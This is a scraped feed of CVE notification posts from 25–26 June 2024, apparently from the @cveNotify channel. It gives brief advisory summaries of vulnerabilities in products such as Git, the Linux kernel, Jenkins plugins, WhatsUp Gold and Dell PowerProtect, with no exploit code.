🚨 CVE-2012-2657Buffer overflow in the SQLDriverConnect function in unixODBC 2.0.10, 2.3.1, and earlier allows local users to cause a denial of service (crash) via a long string in the FILEDSN option. NOTE: this issue might not be a vulnerability, since the ability to set this option typically implies that the attacker already has legitimate access to cause a DoS or execute code, and therefore the issue would not cross privilege boundaries. There may be limited attack scenarios if isql command-line options are exposed to an attacker, although it seems likely that other, more serious issues would also be exposed, and this issue might not cross privilege boundaries in that context.🎖@cveNotify |
|
| 2024-06-26 19:37:25 |
🚨 CVE-2010-5164Race condition in KingSoft Personal Firewall 9 Plus 2009.05.07.70 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute🎖@cveNotify |
|
| 2024-06-26 19:37:24 |
🚨 CVE-2010-5153Race condition in Avira Premium Security Suite 10.0.0.536 on Windows XP allows local users to bypass kernel-mode hook handlers, and execute dangerous code that would otherwise be blocked by a handler but not blocked by signature-based malware detection, via certain user-space memory changes during hook-handler execution, aka an argument-switch attack or a KHOBE attack. NOTE: this issue is disputed by some third parties because it is a flaw in a protection mechanism for situations where a crafted program has already begun to execute🎖@cveNotify |
|
| 2024-06-26 18:37:39 |
🚨 CVE-2024-35545MAP-OS v4.45.0 and earlier was discovered to contain a cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2024-06-26 18:37:38 |
🚨 CVE-2024-39460Jenkins Bitbucket Branch Source Plugin 886.v44cf5e4ecec5 and earlier prints the Bitbucket OAuth access token as part of the Bitbucket URL in the build log in some cases.🎖@cveNotify |
|
| 2024-06-26 18:37:34 |
🚨 CVE-2024-39458When Jenkins Structs Plugin 337.v1b_04ea_4df7c8 and earlier fails to configure a build step, it logs a warning message containing diagnostic information that may contain secrets passed as step parameters, potentially resulting in accidental exposure of secrets through the default system log.🎖@cveNotify |
|
| 2024-06-26 18:37:33 |
🚨 CVE-2024-38082Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2024-06-26 18:37:32 |
🚨 CVE-2024-38083Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2024-06-26 18:37:28 |
🚨 CVE-2024-30058Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2024-06-26 18:37:27 |
🚨 CVE-2024-30057Microsoft Edge for iOS Spoofing Vulnerability🎖@cveNotify |
|
| 2024-06-26 18:37:26 |
🚨 CVE-2024-3542A vulnerability classified as problematic was found in Campcodes Church Management System 1.0. This vulnerability affects unknown code of the file /admin/add_visitor.php. The manipulation of the argument mobile leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259912.🎖@cveNotify |
|
| 2024-06-26 18:37:25 |
🚨 CVE-2024-3539A vulnerability was found in Campcodes Church Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/addgiving.php. The manipulation of the argument amount leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259909 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-26 18:37:24 |
🚨 CVE-2024-3522A vulnerability classified as critical has been found in Campcodes Online Event Management System 1.0. This affects an unknown part of the file /api/process.php. The manipulation of the argument userId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259893 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-26 18:07:26 |
🚨 CVE-2024-37679Cross Site Scripting vulnerability in Hangzhou Meisoft Information Technology Co., Ltd. Finesoft v.8.0 and before allows a remote attacker to execute arbitrary code via a crafted script to the login.jsp parameter.🎖@cveNotify |
|
| 2024-06-26 18:07:25 |
🚨 CVE-2021-45785TruDesk Help Desk/Ticketing Solution v1.1.11 is vulnerable to a Cross-Site Request Forgery (CSRF) attack which would allow an attacker to restart the server, causing a DoS attack. The attacker must craft a webpage that would perform a GET request to the /api/v1/admin/restart endpoint, then the victim (who has sufficient privileges), would visit the page and the server restart would begin. The attacker must know the full URL that TruDesk is on in order to craft the webpage.🎖@cveNotify |
|
| 2024-06-26 18:07:24 |
🚨 CVE-2023-49793CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. Zip files uploaded to the server endpoint of `CodeChecker store` are not properly sanitized. An attacker, using a path traversal attack, can load and display files on the machine of `CodeChecker server`. The vulnerable endpoint is `/Default/v6.53/CodeCheckerService@massStoreRun`. The path traversal vulnerability allows reading data on the machine of the `CodeChecker server`, with the same permission level as the `CodeChecker server`.The attack requires a user account on the `CodeChecker server`, with permission to store to a server, and view the stored report. This vulnerability has been patched in version 6.23.🎖@cveNotify |
|
| 2024-06-26 17:37:31 |
🚨 CVE-2024-6354Improper access control in PAM dashboard in Devolutions Remote Desktop Manager 2024.2.11 and earlier on Windows allows an authenticated user to bypass the execute permission via the use of the PAM dashboard.🎖@cveNotify |
|
| 2024-06-26 17:37:27 |
🚨 CVE-2024-39460Jenkins Bitbucket Branch Source Plugin 886.v44cf5e4ecec5 and earlier prints the Bitbucket OAuth access token as part of the Bitbucket URL in the build log in some cases.🎖@cveNotify |
|
| 2024-06-26 17:37:26 |
🚨 CVE-2024-39459In rare cases Jenkins Plain Credentials Plugin 182.v468b_97b_9dcb_8 and earlier stores secret file credentials unencrypted (only Base64 encoded) on the Jenkins controller file system, where they can be viewed by users with access to the Jenkins controller file system (global credentials) or with Item/Extended Read permission (folder-scoped credentials).🎖@cveNotify |
|
| 2024-06-26 17:37:25 |
🚨 CVE-2024-6104go-retryablehttp prior to 0.7.7 did not sanitize urls when writing them to its log file. This could lead to go-retryablehttp writing sensitive HTTP basic auth credentials to its log file. This vulnerability, CVE-2024-6104, was fixed in go-retryablehttp 0.7.7.🎖@cveNotify |
|
| 2024-06-26 17:37:24 |
🚨 CVE-2024-3612A vulnerability was found in SourceCodester Warehouse Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file barang.php. The manipulation of the argument nama_barang/merek leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260269 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-26 16:37:27 |
🚨 CVE-2024-38272There exists a vulnerability in Quickshare/Nearby where an attacker can bypass the accept file dialog on QuickShare Windows. Normally in QuickShare Windows app we can't send a file without the user accept from the receiving device if the visibility is set to everyone mode or contacts mode. We recommend upgrading to version 1.0.1724.0 of Quickshare or above🎖@cveNotify |
|
| 2024-06-26 16:37:26 |
🚨 CVE-2024-25637October is a self-hosted CMS platform based on the Laravel PHP Framework. The X-October-Request-Handler Header does not sanitize the AJAX handler name and allows unescaped HTML to be reflected back. There is no impact since this vulnerability cannot be exploited through normal browser interactions. This unescaped value is only detectable when using a proxy interception tool. This issue has been patched in version 3.5.15.🎖@cveNotify |
|
| 2024-06-26 16:37:25 |
🚨 CVE-2024-34580Apache XML Security for C++ through 2.0.4 implements the XML Signature Syntax and Processing (XMLDsig) specification without protection against an SSRF payload in a KeyInfo element. NOTE: the supplier disputes this CVE Record on the grounds that they are implementing the specification "correctly" and are not "at fault."🎖@cveNotify |
|
| 2024-06-26 16:37:24 |
🚨 CVE-2015-10129A vulnerability was found in planet-freo up to 20150116 and classified as problematic. Affected by this issue is some unknown functionality of the file admin/inc/auth.inc.php. The manipulation of the argument auth leads to incorrect comparison. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is 6ad38c58a45642eb8c7844e2f272ef199f59550d. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-252716.🎖@cveNotify |
|
| 2024-06-26 16:07:26 |
🚨 CVE-2023-34319The fix for XSA-423 added logic to Linux'es netback driver to deal witha frontend splitting a packet in a way such that not all of the headerswould come in one piece. Unfortunately the logic introduced theredidn't account for the extreme case of the entire packet being splitinto as many pieces as permitted by the protocol, yet still beingsmaller than the area that's specially dealt with to keep all (possible)headers together. Such an unusual packet would therefore trigger abuffer overrun in the driver.🎖@cveNotify |
|
| 2024-06-26 16:07:25 |
🚨 CVE-2023-35788An issue was discovered in fl_set_geneve_opt in net/sched/cls_flower.c in the Linux kernel before 6.3.7. It allows an out-of-bounds write in the flower classifier code via TCA_FLOWER_KEY_ENC_OPTS_GENEVE packets. This may result in denial of service or privilege escalation.🎖@cveNotify |
|
| 2024-06-26 16:07:24 |
🚨 CVE-2007-1667Multiple integer overflows in (1) the XGetPixel function in ImUtil.c in X.Org libx11 before 1.0.3, and (2) XInitImage function in xwd.c for ImageMagick, allow user-assisted remote attackers to cause a denial of service (crash) or obtain sensitive information via crafted images with large or negative values that trigger a buffer overflow.🎖@cveNotify |
|
| 2024-06-26 15:07:29 |
🚨 CVE-2024-38369XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. The content of a document included using `{{include reference="targetdocument"/}}` is executed with the right of the includer and not with the right of its author. This means that any user able to modify the target document can impersonate the author of the content which used the `include` macro. This vulnerability has been patched in XWiki 15.0 RC1 by making the default behavior safe.🎖@cveNotify |
|
| 2024-06-26 15:07:28 |
🚨 CVE-2024-33880An issue was discovered in VirtoSoftware Virto Bulk File Download 5.5.44 for SharePoint 2019. It discloses full pathnames via Virto.SharePoint.FileDownloader/Api/Download.ashx?action=archive.🎖@cveNotify |
|
| 2024-06-26 15:07:27 |
🚨 CVE-2024-33879An issue was discovered in VirtoSoftware Virto Bulk File Download 5.5.44 for SharePoint 2019. The Virto.SharePoint.FileDownloader/Api/Download.ashx isCompleted method allows arbitrary file download and deletion via absolute path traversal in the path parameter.🎖@cveNotify |
|
| 2024-06-26 14:37:40 |
🚨 CVE-2024-5011In WhatsUp Gold versions released before 2023.1.3, an uncontrolled resource consumption vulnerability exists. A specially crafted unauthenticated HTTP request to the TestController Chart functionality can lead to denial of service.🎖@cveNotify |
|
| 2024-06-26 14:37:36 |
🚨 CVE-2024-6287Incorrect Calculation vulnerability in Renesas arm-trusted-firmware allows Local Execution of Code.When checking whether a new image invades/overlaps with a previously loaded image the code neglects to consider a few cases. that could An attacker to bypass memory range restriction and overwrite an already loaded image partly or completely, which could result in code execution and bypass of secure boot.🎖@cveNotify |
|
| 2024-06-26 14:37:35 |
🚨 CVE-2024-33687Insufficient verification of data authenticity issue exists in NJ Series CPU Unit all versions and NX Series CPU Unit all versions. If a user program in the affected product is altered, the product may not be able to detect the alteration.🎖@cveNotify |
|
| 2024-06-26 14:37:34 |
🚨 CVE-2024-4748The CRUDDIY project is vulnerable to shell command injection via sending a crafted POST request to the application server. The exploitation risk is limited since CRUDDIY is meant to be launched locally. Nevertheless, a user with the project running on their computer might visit a website which would send such a malicious request to the locally launched server.🎖@cveNotify |
|
| 2024-06-26 13:37:25 |
🚨 CVE-2022-29420Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Adam Skaat Countdown & Clock (WordPress plugin) countdown-builder allows Stored XSS.This issue affects Countdown & Clock (WordPress plugin): from n/a through 2.3.2.🎖@cveNotify |
|
| 2024-06-26 13:07:43 |
🚨 CVE-2024-37843Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.🎖@cveNotify |
|
| 2024-06-26 13:07:42 |
🚨 CVE-2024-21741GigaDevice GD32E103C8T6 devices have Incorrect Access Control.🎖@cveNotify |
|
| 2024-06-26 13:07:41 |
🚨 CVE-2024-21740Artery AT32F415CBT7 and AT32F421C8T7 devices have Incorrect Access Control.🎖@cveNotify |
|
| 2024-06-26 13:07:38 |
🚨 CVE-2024-21739Geehy APM32F103CCT6, APM32F103RCT6, APM32F103RCT7, and APM32F103VCT6 devices have Incorrect Access Control.🎖@cveNotify |
|
| 2024-06-26 13:07:37 |
🚨 CVE-2024-5276A SQL Injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data. Likely impacts include creation of administrative users and deletion or modification of data in the application database. Data exfiltration via SQL injection is not possible using this vulnerability. Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled, otherwise an authenticated user is required. This issue affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.🎖@cveNotify |
|
| 2024-06-26 13:07:36 |
🚨 CVE-2024-5010In WhatsUp Gold versions released before 2023.1.3, a vulnerability exists in the TestController functionality. A specially crafted unauthenticatedHTTP request can lead to a disclosure of sensitive information.🎖@cveNotify |
|
| 2024-06-26 13:07:32 |
🚨 CVE-2024-5009In WhatsUp Gold versions released before 2023.1.3, an Improper Access Control vulnerability in Wug.UI.Controllers.InstallController.SetAdminPassword allows local attackers to modify admin's password.🎖@cveNotify |
|
| 2024-06-26 13:07:31 |
🚨 CVE-2024-4884In WhatsUp Gold versions released before 2023.1.3, an unauthenticated Remote Code Execution vulnerability in Progress WhatsUpGold. The Apm.UI.Areas.APM.Controllers.CommunityController allows execution of commands with iisapppool\nmconsole privileges.🎖@cveNotify |
|
| 2024-06-26 13:07:30 |
🚨 CVE-2024-4883In WhatsUp Gold versions released before 2023.1.3, a Remote Code Execution issue exists in Progress WhatsUp Gold. This vulnerability allows an unauthenticated attacker to achieve the RCE as a service account through NmApi.exe.🎖@cveNotify |
|
| 2024-06-26 13:07:26 |
🚨 CVE-2024-37167Tuleap is an Open Source Suite to improve management of software developments and collaboration. Users are able to see backlog items that they should not see. This issue has been patched in Tuleap Community Edition version 15.9.99.97.🎖@cveNotify |
|
| 2024-06-26 13:07:25 |
🚨 CVE-2024-37820A nil pointer dereference in PingCAP TiDB v8.2.0-alpha-216-gfe5858b allows attackers to crash the application via expression.inferCollation.🎖@cveNotify |
|
| 2024-06-26 13:07:24 |
🚨 CVE-2024-36819MAP-OS 4.45.0 and earlier is vulnerable to Cross-Site Scripting (XSS). This vulnerability allows malicious users to insert a malicious payload into the "Client Name" input. When a service order from this client is created, the malicious payload is displayed on the administrator and employee dashboards, resulting in unauthorized script execution whenever the dashboard is loaded.🎖@cveNotify |
|
| 2024-06-26 11:37:26 |
🚨 CVE-2024-6344A vulnerability, which was classified as problematic, was found in ZKTeco ZKBio CVSecurity V5000 4.1.0. This affects an unknown part of the component Push Configuration Section. The manipulation of the argument Configuration Name leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-269733 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-26 11:37:25 |
🚨 CVE-2024-37098Server-Side Request Forgery (SSRF) vulnerability in Blossom Themes BlossomThemes Email Newsletter.This issue affects BlossomThemes Email Newsletter: from n/a through 2.2.6.🎖@cveNotify |
|
| 2024-06-26 11:37:24 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-06-26 10:37:31 |
🚨 CVE-2024-32021Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, when cloning a local source repository that contains symlinks via the filesystem, Git may create hardlinks to arbitrary user-readable files on the same filesystem as the target repository in the `objects/` directory. Cloning a local repository over the filesystem may creating hardlinks to arbitrary user-owned files on the same filesystem in the target Git repository's `objects/` directory. When cloning a repository over the filesystem (without explicitly specifying the `file://` protocol or `--no-local`), the optimizations for local cloningwill be used, which include attempting to hard link the object files instead of copying them. While the code includes checks against symbolic links in the source repository, which were added during the fix for CVE-2022-39253, these checks can still be raced because the hard link operation ultimately follows symlinks. If the object on the filesystem appears as a file during the check, and then a symlink during the operation, this will allow the adversary to bypass the check and create hardlinks in the destination objects directory to arbitrary, user-readable files. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4.🎖@cveNotify |
|
| 2024-06-26 10:37:30 |
🚨 CVE-2024-32004Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, an attacker can prepare a local repository in such a way that, when cloned, will execute arbitrary code during the operation. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid cloning repositories from untrusted sources.🎖@cveNotify |
|
| 2024-06-26 10:37:26 |
🚨 CVE-2023-29007Git is a revision control system. Prior to versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, a specially crafted `.gitmodules` file with submodule URLs that are longer than 1024 characters can used to exploit a bug in `config.c::git_config_copy_or_rename_section_in_file()`. This bug can be used to inject arbitrary configuration into a user's `$GIT_DIR/config` when attempting to remove the configuration section associated with that submodule. When the attacker injects configuration values which specify executables to run (such as `core.pager`, `core.editor`, `core.sshCommand`, etc.) this can lead to a remote code execution. A fix A fix is available in versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1. As a workaround, avoid running `git submodule deinit` on untrusted repositories or without prior inspection of any submodule sections in `$GIT_DIR/config`.🎖@cveNotify |
|
| 2024-06-26 10:37:25 |
🚨 CVE-2023-25652Git is a revision control system. Prior to versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, by feeding specially crafted input to `git apply --reject`, a path outside the working tree can be overwritten with partially controlled contents (corresponding to the rejected hunk(s) from the given patch). A fix is available in versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1. As a workaround, avoid using `git apply` with `--reject` when applying patches from an untrusted source. Use `git apply --stat` to inspect a patch before applying; avoid applying one that create a conflict where a link corresponding to the `*.rej` file exists.🎖@cveNotify |
|
| 2024-06-26 10:37:24 |
🚨 CVE-2019-1387An issue was found in Git before v2.24.1, v2.23.1, v2.22.2, v2.21.1, v2.20.2, v2.19.3, v2.18.2, v2.17.3, v2.16.6, v2.15.4, and v2.14.6. Recursive clones are currently affected by a vulnerability that is caused by too-lax validation of submodule names, allowing very targeted attacks via remote code execution in recursive clones.🎖@cveNotify |
|
| 2024-06-26 07:37:24 |
🚨 CVE-2024-5215The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 2.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-26 04:37:30 |
🚨 CVE-2024-37140Dell PowerProtect DD, versions prior to 8.0, LTS 7.13.1.0, LTS 7.10.1.30, LTS 7.7.5.40 contain an OS command injection vulnerability in an admin operation. A remote low privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the system application's underlying OS with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.🎖@cveNotify |
|
| 2024-06-26 04:37:26 |
🚨 CVE-2024-37138Dell PowerProtect DD, versions prior to 8.0, LTS 7.13.1.0, LTS 7.10.1.30, LTS 7.7.5.40 on DDMC contain a relative path traversal vulnerability. A remote high privileged attacker could potentially exploit this vulnerability, leading to the application sending over an unauthorized file to the managed system.🎖@cveNotify |
|
| 2024-06-26 04:37:25 |
🚨 CVE-2024-29972** UNSUPPORTED WHEN ASSIGNED **The command injection vulnerability in the CGI program "remote_help-cgi" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.🎖@cveNotify |
|
| 2024-06-26 03:37:38 |
🚨 CVE-2024-5181A command injection vulnerability exists in the mudler/localai version 2.14.0. The vulnerability arises from the application's handling of the backend parameter in the configuration file, which is used in the name of the initialized process. An attacker can exploit this vulnerability by manipulating the path of the vulnerable binary file specified in the backend parameter, allowing the execution of arbitrary code on the system. This issue is due to improper neutralization of special elements used in an OS command, leading to potential full control over the affected system.🎖@cveNotify |
|
| 2024-06-26 03:37:37 |
🚨 CVE-2024-29177Dell PowerProtect DD, versions prior to 8.0, LTS 7.13.1.0, LTS 7.10.1.30, LTS 7.7.5.40 contain a disclosure of temporary sensitive information vulnerability. A remote high privileged attacker could potentially exploit this vulnerability, leading to the reuse of disclosed information to gain unauthorized access to the application report.🎖@cveNotify |
|
| 2024-06-26 03:37:34 |
🚨 CVE-2024-29176Dell PowerProtect DD, versions prior to 8.0, LTS 7.13.1.0, LTS 7.10.1.30, LTS 7.7.5.40 contain a buffer overflow vulnerability. A remote low privileged attacker could potentially exploit this vulnerability, leading to an application crash or execution of arbitrary code on the vulnerable application's underlying operating system with privileges of the vulnerable application.🎖@cveNotify |
|
| 2024-06-26 03:37:33 |
🚨 CVE-2024-29174Dell Data Domain, versions prior to 7.13.0.0, LTS 7.7.5.30, LTS 7.10.1.20 contain an SQL Injection vulnerability. A local low privileged attacker could potentially exploit this vulnerability, leading to the execution of certain SQL commands on the application's backend database causing unauthorized access to application data.🎖@cveNotify |
|
| 2024-06-26 03:37:32 |
🚨 CVE-2024-28973Dell PowerProtect DD, versions prior to 8.0, LTS 7.13.1.0, LTS 7.10.1.30, LTS 7.7.5.40 contain a Stored Cross-Site Scripting Vulnerability. A remote high privileged attacker could potentially exploit this vulnerability, leading to the storage of malicious HTML or JavaScript codes in a trusted application data store. When a high privileged victim user accesses the data store through their browsers, the malicious code gets executed by the web browser in the context of the vulnerable web application. Exploitation may lead to information disclosure, session theft, or client-side request forgery🎖@cveNotify |
|
| 2024-06-26 02:37:30 |
🚨 CVE-2023-29483eventlet before 0.35.2, as used in dnspython before 2.6.0, allows remote attackers to interfere with DNS name resolution by quickly sending an invalid packet from the expected IP address and source port, aka a "TuDoor" attack. In other words, dnspython does not have the preferred behavior in which the DNS name resolution algorithm would proceed, within the full time window, in order to wait for a valid packet. NOTE: dnspython 2.6.0 is unusable for a different reason that was addressed in 2.6.1.🎖@cveNotify |
|
| 2024-06-26 01:37:24 |
🚨 CVE-2024-24764October is a self-hosted CMS platform based on the Laravel PHP Framework. This issue affects authenticated administrators who may be redirected to an untrusted URL using the PageFinder schema. The resolver for the page finder link schema (`october://`) allowed external links, therefore allowing an open redirect outside the scope of the active host. This vulnerability has been patched in version 3.5.15.🎖@cveNotify |
|
| 2024-06-26 00:37:30 |
🚨 CVE-2024-5460A vulnerability in the default configuration of the Simple Network Management Protocol (SNMP) feature of Brocade Fabric OS versions before v9.0.0 could allow an authenticated, remote attacker to read data from an affected device via SNMP. The vulnerability is due to hard-coded, default community string in the configuration file for the SNMP daemon. An attacker could exploit this vulnerability by using the static community string in SNMP version 1 queries to an affected device.🎖@cveNotify |
|
| 2024-06-26 00:37:29 |
🚨 CVE-2024-4869The WP Cookie Consent ( for GDPR, CCPA & ePrivacy ) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘Client-IP’ header in all versions up to, and including, 3.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-26 00:37:26 |
🚨 CVE-2024-38526pdoc provides API Documentation for Python Projects. Documentation generated with `pdoc --math` linked to JavaScript files from polyfill.io. The polyfill.io CDN has been sold and now serves malicious code. This issue has been fixed in pdoc 14.5.1.🎖@cveNotify |
|
| 2024-06-26 00:37:25 |
🚨 CVE-2024-29953A vulnerability in the web interface in Brocade Fabric OS before v9.2.1, v9.2.0b, and v9.1.1d prints encoded session passwords on session storage for Virtual Fabric platforms. This could allow an authenticated user to view other users' session encoded passwords.🎖@cveNotify |
|
| 2024-06-26 00:37:24 |
🚨 CVE-2024-5806Improper Authentication vulnerability in Progress MOVEit Transfer (SFTP module) can lead to Authentication Bypass.This issue affects MOVEit Transfer: from 2023.0.0 before 2023.0.11, from 2023.1.0 before 2023.1.6, from 2024.0.0 before 2024.0.2.🎖@cveNotify |
|
| 2024-06-25 23:37:32 |
🚨 CVE-2023-52482In the Linux kernel, the following vulnerability has been resolved:x86/srso: Add SRSO mitigation for Hygon processorsAdd mitigation for the speculative return stack overflow vulnerabilitywhich exists on Hygon processors too.🎖@cveNotify |
|
| 2024-06-25 23:37:31 |
🚨 CVE-2024-26581In the Linux kernel, the following vulnerability has been resolved:netfilter: nft_set_rbtree: skip end interval element from gcrbtree lazy gc on insert might collect an end interval element that hasbeen just added in this transactions, skip end interval elements thatare not yet active.🎖@cveNotify |
|
| 2024-06-25 23:37:26 |
🚨 CVE-2024-1151A vulnerability was reported in the Open vSwitch sub-component in the Linux Kernel. The flaw occurs when a recursive operation of code push recursively calls into the code block. The OVS module does not validate the stack depth, pushing too many frames and causing a stack overflow. As a result, this can lead to a crash or other related issues.🎖@cveNotify |
|
| 2024-06-25 23:37:25 |
🚨 CVE-2024-0340A vulnerability was found in vhost_new_msg in drivers/vhost/vhost.c in the Linux kernel, which does not properly initialize memory in messages passed between virtual guests and the host operating system in the vhost/vhost.c:vhost_new_msg() function. This issue can allow local privileged users to read some kernel memory contents when reading from the /dev/vhost-net device file.🎖@cveNotify |
|
| 2024-06-25 22:37:35 |
🚨 CVE-2024-24861A race condition was found in the Linux kernel's media/xc4000 device driver in xc4000 xc4000_get_frequency() function. This can result in return value overflow issue, possibly leading to malfunction or denial of service issue.🎖@cveNotify |
|
| 2024-06-25 22:37:31 |
🚨 CVE-2024-22099NULL Pointer Dereference vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (net, bluetooth modules) allows Overflow Buffers. This vulnerability is associated with program files /net/bluetooth/rfcomm/core.C.This issue affects Linux kernel: v2.6.12-rc2.🎖@cveNotify |
|
| 2024-06-25 22:37:30 |
🚨 CVE-2024-23850In btrfs_get_root_ref in fs/btrfs/disk-io.c in the Linux kernel through 6.7.1, there can be an assertion failure and crash because a subvolume can be read out too soon after its root item is inserted upon subvolume creation.🎖@cveNotify |
|
| 2024-06-25 22:37:26 |
🚨 CVE-2023-6270A flaw was found in the ATA over Ethernet (AoE) driver in the Linux kernel. The aoecmd_cfg_pkts() function improperly updates the refcnt on `struct net_device`, and a use-after-free can be triggered by racing between the free on the struct and the access through the `skbtxq` global queue. This could lead to a denial of service condition or potential code execution.🎖@cveNotify |
|
| 2024-06-25 22:37:25 |
🚨 CVE-2023-47233The brcm80211 component in the Linux kernel through 6.5.10 has a brcmf_cfg80211_detach use-after-free in the device unplugging (disconnect the USB by hotplug) code. For physically proximate attackers with local access, this "could be exploited in a real world scenario." This is related to brcmf_cfg80211_escan_timeout_worker in drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c.🎖@cveNotify |
|
| 2024-06-25 21:37:33 |
🚨 CVE-2024-0646An out-of-bounds memory write flaw was found in the Linux kernel’s Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-06-25 21:37:26 |
🚨 CVE-2023-6040An out-of-bounds access vulnerability involving netfilter was reported and fixed as: f1082dd31fe4 (netfilter: nf_tables: Reject tables of unsupported family); While creating a new netfilter table, lack of a safeguard against invalid nf_tables family (pf) values within `nf_tables_newtable` function enables an attacker to achieve out-of-bounds access.🎖@cveNotify |
|
| 2024-06-25 21:37:25 |
🚨 CVE-2022-38096A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).🎖@cveNotify |
|
| 2024-06-25 20:37:41 |
🚨 CVE-2024-5276A SQL Injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data. Likely impacts include creation of administrative users and deletion or modification of data in the application database. Data exfiltration via SQL injection is not possible using this vulnerability. Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled, otherwise an authenticated user is required. This issue affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.🎖@cveNotify |
|
| 2024-06-25 20:37:37 |
🚨 CVE-2024-5010In WhatsUp Gold versions released before 2023.1.3, a vulnerability exists in the TestController functionality. A specially crafted unauthenticatedHTTP request can lead to a disclosure of sensitive information.🎖@cveNotify |
|
| 2024-06-25 20:37:36 |
🚨 CVE-2024-5008In WhatsUp Gold versions released before 2023.1.3, an authenticated user with certain permissions can upload an arbitrary file and obtain RCE using Apm.UI.Areas.APM.Controllers.Api.Applications.AppProfileImportController.🎖@cveNotify |
|
| 2024-06-25 20:37:35 |
🚨 CVE-2024-4885In WhatsUp Gold versions released before 2023.1.3, an unauthenticated Remote Code Execution vulnerability in Progress WhatsUpGold. The WhatsUp.ExportUtilities.Export.GetFileWithoutZip allows execution of commands with iisapppool\nmconsole privileges.🎖@cveNotify |
|
| 2024-06-25 20:37:32 |
